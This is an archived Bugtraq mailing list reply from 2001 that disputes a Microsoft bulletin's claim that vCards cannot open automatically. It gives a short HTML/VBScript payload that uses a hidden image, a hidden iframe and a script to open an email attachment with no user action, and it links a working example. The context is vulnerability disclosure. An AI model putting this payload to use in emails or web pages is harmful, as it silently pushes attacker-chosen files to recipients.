Bugtraq mailing list archives
Re: Microsoft Security Bulletin MS01-012
From: "http-equiv () excite com" <http-equiv () excite com>
Date: Sun, 25 Feb 2001 12:14:10 -0800
Dear Sir,
Mitigating Factors: ==================== - There is no means by which a Vcard could be made to open automatically.
This is not entirely accurate. If you are in the habit of collecting these odd things, you will have most certainly uncheck-marked the security warning a long time ago. In that case it is less than trivial to open the Vcard automatically: <img id="Bill_Gates" SRC="cid:malware.com" style="VISIBILITY: hidden"> <IFRAME id=Compelling style="VISIBILITY: hidden"> </IFRAME> <SCRIPT language=vbs> document.all.item("Compelling").document.location=Bill_Gates.src </SCRIPT> Working example: http://www.malware.com/crap.eml Yours Sincerely, Your friend and mine, http://www.malware.com -- _______________________________________________________ Send a cool gift with your E-Card http://www.bluemountain.com/giftcenter/
Current thread:
- Microsoft Security Bulletin MS01-012 Microsoft Product Security (Feb 23)
- <Possible follow-ups>
- Re: Microsoft Security Bulletin MS01-012 joelmoses (Feb 26)
- Re: Microsoft Security Bulletin MS01-012 http-equiv () excite com (Feb 26)
- Re: Microsoft Security Bulletin MS01-012 Philip Stoev (Feb 27)
- Re: Microsoft Security Bulletin MS01-012 Chris Timmons (Feb 28)
- Re: Microsoft Security Bulletin MS01-012 Philip Stoev (Feb 27)
- Re: Microsoft Security Bulletin MS01-012 foobar (Feb 28)